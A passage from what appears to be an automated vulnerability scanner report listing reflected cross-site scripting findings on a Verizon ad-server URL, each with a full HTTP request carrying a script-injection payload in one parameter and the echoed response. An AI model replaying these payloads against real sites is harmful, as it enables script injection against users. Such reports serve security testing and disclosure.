/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=56d47"><script>alert(1)</script>810ed66b159&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex
...[SNIP]...

3.69. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862d1"><script>alert(1)</script>ce12940af71 was submitted in the pts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=862d1"><script>alert(1)</script>ce12940af71&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:56:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
tate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=862d1"><script>alert(1)</script>ce12940af71&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.70. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pws parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a25"><script>alert(1)</script>030f87d661d was submitted in the pws parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=98a25"><script>alert(1)</script>030f87d661d&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
8326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=98a25"><script>alert(1)</script>030f87d661d&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.71. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55331"><script>alert(1)</script>3099bd94315 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=55331"><script>alert(1)</script>3099bd94315 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:58:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=55331"><script>alert(1)</script>3099bd94315" target="_top">
...[SNIP]...

3.72. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [sec_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a8c"><script>alert(1)</script>afe03052625 was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=a3a8c"><script>alert(1)</script>afe03052625&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:56:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
y=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=a3a8c"><script>alert(1)</script>afe03052625&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.73. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_enh_msg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98904"><script>alert(1)</script>6476ec4b36d was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=98904"><script>alert(1)</script>6476ec4b36d&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=98904"><script>alert(1)</script>6476ec4b36d&webex=&search=" target="_top">
...[SNIP]...

3.74. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_premmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd524"><script>alert(1)</script>db31b89a21 was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=bd524"><script>alert(1)</script>db31b89a21&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1358
Content-Type: text/html
Cache-Control: private
Content-Length: 1358

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=bd524"><script>alert(1)</script>db31b89a21&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.75. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [usertype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c3a7"><script>alert(1)</script>6769bca969e was submitted in the usertype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer1c3a7"><script>alert(1)</script>6769bca969e&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
sur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer1c3a7"><script>alert(1)</script>6769bca969e&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target=
...[SNIP]...

3.76. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vasonly parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da1a"><script>alert(1)</script>d0153c69ecc was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=6da1a"><script>alert(1)</script>d0153c69ecc&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:53:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=6da1a"><script>alert(1)</script>d0153c69ecc&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.77. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodfamily parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59812"><script>alert(1)</script>b6620b35637 was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=59812"><script>alert(1)</script>b6620b35637&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
1693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=59812"><script>alert(1)</script>b6620b35637&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.78. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodunlim parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e095"><script>alert(1)</script>1f394cc321d was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=3e095"><script>alert(1)</script>1f394cc321d&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=3e095"><script>alert(1)</script>1f394cc321d&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.79. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [viss parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff424"><script>alert(1)</script>ef31f985b3 was submitted in the viss parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=ff424"><script>alert(1)</script>ef31f985b3&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
